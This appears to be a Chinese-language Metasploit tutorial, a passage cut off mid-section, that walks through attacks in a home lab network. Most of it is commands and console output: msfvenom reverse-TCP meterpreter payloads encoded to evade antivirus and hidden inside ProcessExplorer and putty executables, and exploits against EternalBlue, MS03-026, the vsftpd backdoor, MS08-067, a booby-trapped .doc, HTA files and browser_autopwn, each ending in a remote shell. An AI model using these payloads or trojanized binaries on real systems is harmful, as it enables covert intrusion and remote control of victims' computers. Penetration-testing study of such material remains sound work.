要使用的编码器(使用-列出要列出的编码器)

--service-name

<value>

生成服务二进制文件时要使用的服务名称

--sec-name

<value>

生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串

--smallest

使用所有可用编码器生成尽可能最小的有效载荷

--encrypt

<value>

应用于外壳代码的加密或编码类型(使用--list encrypt to list)

--encrypt-key

<value>

用于加密的密钥

--encrypt-iv

<value>

加密的初始化向量

-a, --arch

<arch>

用于--有效负载和--编码器的架构(使用--列出要列出的ARCH)

--platform

<platform>

有效负载的平台(使用列出要列出的平台)

-o, --out

<path>

将有效负载保存到文件中

-b, --bad-chars

<list>

要避免的字符示例: 'x00xff'

-n, --nopsled

<length>

在有效负载上预先添加一个[length]大小的nopled

--pad-nops

使用-n<length>指定的nopled size作为总有效负载大小,自动预加数量的nopled(nops减去有效负载长度)

-s, --space

<length>

产生的有效载荷的最大大小

--encoder-space

<length>

编码有效负载的最大大小(默认为-s值)

-i, --iterations

<count>

对有效负载进行编码的次数

-c, --add-code

<path>

指定要包括的其他win32外壳代码文件

-x, --template

<path>

指定要用作模板的自定义可执行文件

-k, --keep

保留--模板行为,并将负载作为新线程注入

-v, --var-name

<value>

指定用于某些输出格式的自定义变量名

-t, --timeout

<second>

从STDIN读取有效负载时等待的秒数(默认为30,0表示禁用)

-h, --help

显示此消息

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk

躲避杀毒软件的监测

使用MSF编码器
代码语言:javascript复制
 # msfvenom -l encoders
Framework Encoders [--encoder]
======================================
    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit      manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic         normal     Dynamic key XOR Encodermsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe
自定义可自行文件模板

wget http://download.sysinternals.com/files/ProcessExplorer.zip(也可以从国内网站上取)

代码语言:javascript复制
msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload1.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 2661376 bytes
Saved as: payload1.exe

将payload1.exe上传到windows下

代码语言:javascript复制
# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05  0800
meterpreter > pwd
C:UsersxiangDesktop
隐秘地启动一个攻击负载
代码语言:javascript复制
msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b 'x00x0axff' -i 10 -f exe -o payload2.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 702464 bytes
Saved as: payload2.exe

将payload2.exe上传到windows下

代码语言:javascript复制
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50  0800
meterpreter >
加壳

upx

代码语言:javascript复制
#upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                      -l    list compressed file
  -t     test compressed file                -V    display version number
  -h     give more help                   -L    display software license
Options:
  -q     be quiet                         -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io

开始渗透

利用主机漏洞渗透

利用操作系统漏洞
Windows 7
代码语言:javascript复制
msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CST
Nmap scan report for 192.168.0.1
…
Nmap scan report for 192.168.0.158
…
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs:  CVE:CVE-2017-0143
| Risk factor: HIGH
…
msf6 > search ms17-010
Matching Modules
================
   #  Name  Disclosure Date  Rank Check  Description
   -  ----  ---------------  ---- -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14   average  YesMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec   2017-03-14   normal   YesMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command  2017-03-14   normal   No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010 normal   No MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14   greatYesSMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[ ] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[ ] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[ ] 192.168.0.158:445 - Connection established for exploitation.
[ ] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[ ] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[ ] 192.168.0.158:445 - Sending SMBv2 buffers
[ ] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[ ] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15  0800
[ ] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[ ] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[ ] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >

Windows 2000

代码语言:javascript复制
msf6> use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170
RHOST => 192.168.0.170
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...
[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.0.170:4444
[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55  0800
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
C:WINNTsystem32>
利用木马

Windows 10、7、2003

代码语言:javascript复制
msf> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit/multi/handler> set lhost 192.168.0.150
lhost => 192.168.0.150
msf exploit/multi/handler> set lport 8888
lport => 8888
msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit/multi/handler> run


[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24  0800
meterpreter >

利用客户端漏洞渗透

利用软件vsftpd 2.3.4

Linux

代码语言:javascript复制
msf6 > nmap -sT -A -P0 192.168.0.161
msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161
[*] exec: nmap -sT -A -P0 192.168.0.161


Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CST
Nmap scan report for 192.168.0.161
Host is up (0.00081s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.0.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_ssl-date: 2022-07-14T10:36:30 00:00;  6s from scanner time.
msf6 >search vsftpd
Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >exploit
[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.161:21 - USER: 331 Please specify the password.
[ ] 192.168.0.161:21 - Backdoor service has been spawned, handling...
[ ] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26  0800
暴力猜测目标开放的端口

Windows 2000

mf6>use exploit/windows/smb/ms08_067_netapi

代码语言:javascript复制
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.0.150:1
[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 1 is not valid and will be closed
192.168.0.158 windows 2000 自动关机
使用msf.doc文件

Windows 2000 SP0/SP4 English

代码语言:javascript复制
msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > info
Name: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
Module: exploit/windows/fileformat/ms11_006_createsizeddibsection
Platform: Windows
       Arch: 
Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2010-12-15
Provided by:
  Moti & Xu Hao
  Yaniv Miron aka Lament of ilhack
  jduck 
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows 2000 SP0/SP4 English
  2   Windows XP SP3 English
  3   Crash Target for Debugging
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.doc          yes       The file name.
Payload information:
  Space: 512
  Avoid: 1 characters
Description:
  This module exploits a stack-based buffer overflow in the handling
  of thumbnails within .MIC files and various Office documents. When
  processing a thumbnail bitmap containing a negative 'biClrUsed'
  value, a stack-based buffer overflow occurs. This leads to arbitrary
  code execution. In order to trigger the vulnerable code, the folder
  containing the document must be viewed using the "Thumbnails" view.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3970
  OSVDB (70263)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006
  http://www.securityfocus.com/bid/45662
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[ ] msf.doc created at /root/.msf4/local/msf.doc
#cp /root/.msf4/local/msf.doc /home/jerry/

复制msf.doc到windows下

代码语言:javascript复制
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
windows下打开msf.doc
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53  0800
使用HTA文件进行攻击

Windows 10、7

HTA文件解析程序

C:WindowsSystem32mshta.exe

HTA文件解析程序文件运行

demo.hta

代码语言:javascript复制
<html>
<title>WEB安全测试实验</title>
<link
rel="stylesheet" type="text/css"
href="../css/style.css">
<head>
<meta
http-equiv="Content-Type" content="text/html;
charset=utf-8">
</head>
<body>
<h1>WEB 安全测试实验</h1>
</body>
</html>

WEB 安全测试实验

直接运行

在浏览器中运行

开始攻击

代码语言:javascript复制
#msfconsole 
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:4444
msf6 exploit(windows/fileformat/office_word_hta) > [ ] msf.doc stored at /home/jerry/.msf4/local/msf.doc
[*] Using URL: http://0.0.0.0:8080/default.hta
[*] Local IP: http://192.168.0.150:8080/default.hta
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50  0800

打开被攻击对象浏览器,输入http://192.168.0.150:8080/default.hta,直接运行或者保存default.hta再运行,被攻击成功。

代码语言:javascript复制
msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
  Id  Name  Type   Information  Connection
  --  ----  ----   ---------------------
  1  meterpreter x86/windows  DESKTOP-9A8VFKBxiang @ DES 192.168.0.150:4444 -> 192.16
  KTOP-9A8VFKB 8.0.106:8176  (192.168.0.106
 )
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:UsersxiangDownloads
=================================


Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27  0800  default.hta
100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52  0800  desktop.ini


meterpreter > pwd
C:UsersxiangDownloads
meterpreter > getuid
Server username: DESKTOP-9A8VFKBxiang
利用浏览器插件:adobe flash进行攻击

没有成功,估计现在不支持adobe flash

#msfconsole

msf6 > search adobe_flash

代码语言:javascript复制
msf6 > use 9
msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc
[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc
[*] Server started.

服务器安装adobe flash play 17 Active,在浏览器输入:http://192.168.0.150:8080/y0dKYgEIkI2zc,就被激活

监测浏览器漏洞
利用browser_autopwn进行攻击

Windows 10、7、2003

代码语言:javascript复制
msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 27.
msf6 auxiliary(server/browser_autopwn) >
[*] Setup
[*] Starting exploit modules on host 192.168.0.150...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QOSlCDKP
[*] Local IP: http://192.168.0.150:8080/QOSlCDKP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ
[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ
[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF
[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA
[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU
[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD
[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pyJEvk
[*] Local IP: http://192.168.0.150:8080/pyJEvk
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/huhYFRmk
[*] Local IP: http://192.168.0.150:8080/huhYFRmk
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jAzqekl
[*] Local IP: http://192.168.0.150:8080/jAzqekl
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JCbqIs
[*] Local IP: http://192.168.0.150:8080/JCbqIs
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA
[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kRyiwct
[*] Local IP: http://192.168.0.150:8080/kRyiwct
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe
[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe
[*] Server started.
…
[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ
[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ
[*] Server started.

在被测浏览器中输入:http://192.168.0.150:8080/PdyJht6uQ 等

代码语言:javascript复制
[*] 192.168.0.106ie_createobject - Sending exploit HTML...
[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL
[*] 192.168.0.106mozilla_nstreerange - Sending HTML
[*] 192.168.0.106mozilla_nstreerange - Sending XUL
[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe
[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Interrupt: use the 'exit' command to quit
msf6 auxiliary(server/browser_autopwn) > sessions -i
Active sessions
===============
No active sessions.
利用browser_autopwn2进行攻击

Windows 2003

代码语言:javascript复制
msf6 > use server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > run
[*] Auxiliary module running as background job 0.
[*] Searching BES exploits, please wait...
msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 31.071206468
[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f
[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f


[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
 Order  Rank   Name   Payload
 -----  ----   ----   -------
 1 Excellent  firefox_webidl_injection  firefox/shell_reverse_tcp on 4442
 2 Excellent  firefox_tostring_console_injection  firefox/shell_reverse_tcp on 4442
 3 Excellent  firefox_svg_plugin  firefox/shell_reverse_tcp on 4442
 4 Excellent  firefox_proto_crmfrequestfirefox/shell_reverse_tcp on 4442
 5 Excellent  webview_addjavascriptinterface   android/meterpreter/reverse_tcp on 4443
 6 Excellent  samsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 4443
 7 Great adobe_flash_worker_byte_array_uaf  windows/meterpreter/reverse_tcp on 4444
 8 Great adobe_flash_domain_memory_uafwindows/meterpreter/reverse_tcp on 4444
 9 Great adobe_flash_copy_pixels_to_byte_arra windows/meterpreter/reverse_tcp on 4444
 10 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444
 11 Great adobe_flash_delete_range_tl_op  osx/x86/shell_reverse_tcp on 4447
 12 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444
 13 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444
 14 Great adobe_flash_shader_drawing_fill  windows/meterpreter/reverse_tcp on 4444
 15 Great adobe_flash_pixel_bender_bofwindows/meterpreter/reverse_tcp on 4444
 16 Great adobe_flash_opaque_background_uaf  windows/meterpreter/reverse_tcp on 4444
 17 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444
 18 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444
 19 Great adobe_flash_hacking_team_uaf   windows/meterpreter/reverse_tcp on 4444
 20 Good wellintech_kingscada_kxclientdownloa windows/meterpreter/reverse_tcp on 44 44
 21 Good ms14_064_ole_code_execution   windows/meterpreter/reverse_tcp on 4444
[ ] Please use the following URL for the browser attack:
[ ] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Server started.

在被测浏览器中输入:http://192.168.0.150:8080/IqV4IRZ7Q85f

代码语言:javascript复制
[*] Gathering target information for 192.168.0.169
[*] Sending HTML response to 192.168.0.169
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45  0800
利用Web漏洞

Windows 10、7、2003、2000

http://192.168.0.160:8100/sec/17/example.php?cmd=是一个PHP命令注入漏洞

代码语言:javascript复制
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
Name Current Setting  Required  Description
---- ---------------  --------  -----------
SRVHOST  0.0.0.0   yes The local host or network interface to listen on. This
  must be an address on the local machine or 0.0.0.0 to l
  isten on all addresses.
SRVPORT  8080  yesThe local port to listen on.
